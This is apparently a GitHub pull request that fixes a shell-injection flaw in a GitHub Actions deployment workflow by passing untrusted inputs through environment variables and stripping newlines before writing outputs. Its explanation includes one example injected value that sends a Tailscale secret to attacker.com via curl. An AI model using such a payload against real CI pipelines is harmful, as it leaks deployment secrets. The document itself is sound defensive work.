[WEB-7945] fix(security): prevent shell injection in feature-deployment.yml#9334
Conversation
…nt.yml
Bind `github.event.inputs.base_tag_name` and `env.TARGET_BRANCH` to
step-level env vars (INPUT_BASE_TAG_NAME, GH_TARGET_BRANCH) and
reference them as shell variables in the run: script instead of
interpolating ${{ }} expressions inline.
GitHub Actions expands ${{ }} before the shell executes, so a crafted
base_tag_name value could inject arbitrary commands into the runner
context (GHSA-gfj7-g3wj-2p5f). Using env: breaks the injection path —
the value is set as a process environment variable, never as raw shell
text.
Co-authored-by: Plane AI <noreply@plane.so>
|
No actionable comments were generated in the recent review. 🎉 ℹ️ Recent review info⚙️ Run configurationConfiguration used: defaults Review profile: CHILL Plan: Pro Run ID: 📒 Files selected for processing (1)
🚧 Files skipped from review as they are similar to previous changes (1)
📝 WalkthroughWalkthroughThe ChangesFeature Deployment Workflow: Safe Env Var Binding
Estimated code review effort🎯 1 (Trivial) | ⏱️ ~3 minutes Poem
🚥 Pre-merge checks | ✅ 5✅ Passed checks (5 passed)
✨ Finishing Touches🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
|
Linked to Plane Work Item(s) This comment was auto-generated by Plane |
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Inline comments:
In @.github/workflows/feature-deployment.yml:
- Around line 44-45: The AIO_BASE_TAG output write in the feature-deployment
workflow is vulnerable to output injection because INPUT_BASE_TAG_NAME is
written directly to $GITHUB_OUTPUT. Update the shell step that emits
AIO_BASE_TAG to either reject any value containing carriage returns or newlines
before writing, or use the GitHub Actions multiline output format with a unique
delimiter; keep the fix localized to the step that handles INPUT_BASE_TAG_NAME
and AIO_BASE_TAG.
🪄 Autofix (Beta)
Fix all unresolved CodeRabbit comments on this PR:
- Push a commit to this branch (recommended)
- Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 5ae2757e-d268-4a4b-8f18-873bcb5a2b44
📒 Files selected for processing (1)
.github/workflows/feature-deployment.yml
…UB_OUTPUT A newline embedded in the value would let an attacker forge additional output keys in the line-delimited $GITHUB_OUTPUT file (output injection). Strip \r and \n via tr before writing AIO_BASE_TAG, addressing the CodeRabbit finding on PR #9334. Co-authored-by: Plane AI <noreply@plane.so>
Summary
github.event.inputs.base_tag_nameandenv.TARGET_BRANCHto step-levelenv:vars (INPUT_BASE_TAG_NAME,GH_TARGET_BRANCH) in theset_env_variablesstep offeature-deployment.yml${{ }}expressions removed from therun:shell block; shell variables ($INPUT_BASE_TAG_NAME,$GH_TARGET_BRANCH) used insteadworkflow_dispatchinputWhy this matters
GitHub Actions expands
${{ }}expressions before the shell executes therun:script. A collaborator withworkflow_dispatchtrigger permission could supply a craftedbase_tag_name(e.g.$(curl attacker.com/exfil?t=$TAILSCALE_OAUTH_SECRET)preview) and execute arbitrary commands in the runner context, which has access to DOCKERHUB, Tailscale, and Kubernetes secrets.The fix is the GitHub-recommended mitigation: set the untrusted value as a process env var on the step, then reference
$VARin the shell — the value is never interpreted as shell code by the Actions expression engine.Test plan
Feature Previewworkflow viaworkflow_dispatchwith a normalbase_tag_name— build and deploy should proceed as beforeAIO_BASE_TAGcorrectly from the input (or defaults todevelopwhen empty)FLAT_BRANCH_NAMEis still derived correctly from the branch nameCo-authored-by: Plane AI noreply@plane.so
Summary by CodeRabbit